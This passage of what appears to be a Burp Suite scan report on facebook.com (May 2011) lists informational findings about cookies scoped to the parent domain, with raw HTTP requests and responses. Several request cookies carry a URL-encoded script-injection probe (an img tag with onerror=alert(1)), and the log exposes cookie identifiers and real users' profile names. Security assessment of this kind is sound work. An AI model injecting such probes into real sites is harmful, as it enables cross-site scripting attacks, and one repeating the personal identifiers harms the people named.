<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.76. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/memorial-high-school-west-new-york-nj/114508558584580 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.53
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 27189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.77. http://www.facebook.com/patroyo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /patroyo

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /patroyo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.78. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky%20-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky%20-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; wd=1022x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.187.63
X-Cnection: close
Date: Thu, 05 May 2011 11:56:54 GMT
Content-Length: 0


10.79. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.41
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.80. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Alexander-Bucky-Jordan/1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.81. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Bucky-Jordan%20/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.104.59
X-Cnection: close
Date: Thu, 05 May 2011 11:39:24 GMT
Content-Length: 0


10.82. http://www.facebook.com/people/Bucky-Jordan/100000824820783

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsd=bYeMg; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.83. http://www.facebook.com/policy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /policy.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.57
X-Cnection: close
Date: Thu, 05 May 2011 11:43:31 GMT
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.84. http://www.facebook.com/privacy/explanation.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.85. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile.php?id=1708077046 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Roy-Chastain/1708077046
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.152.75
Connection: close
Date: Thu, 05 May 2011 11:42:14 GMT
Content-Length: 0


10.86. http://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.87. http://www.facebook.com/recover.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /recover.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recover.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: https://www.facebook.com/recover.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.155.107
X-Cnection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 0
Connection: close


10.88. http://www.facebook.com/robynalys

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /robynalys

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /robynalys HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
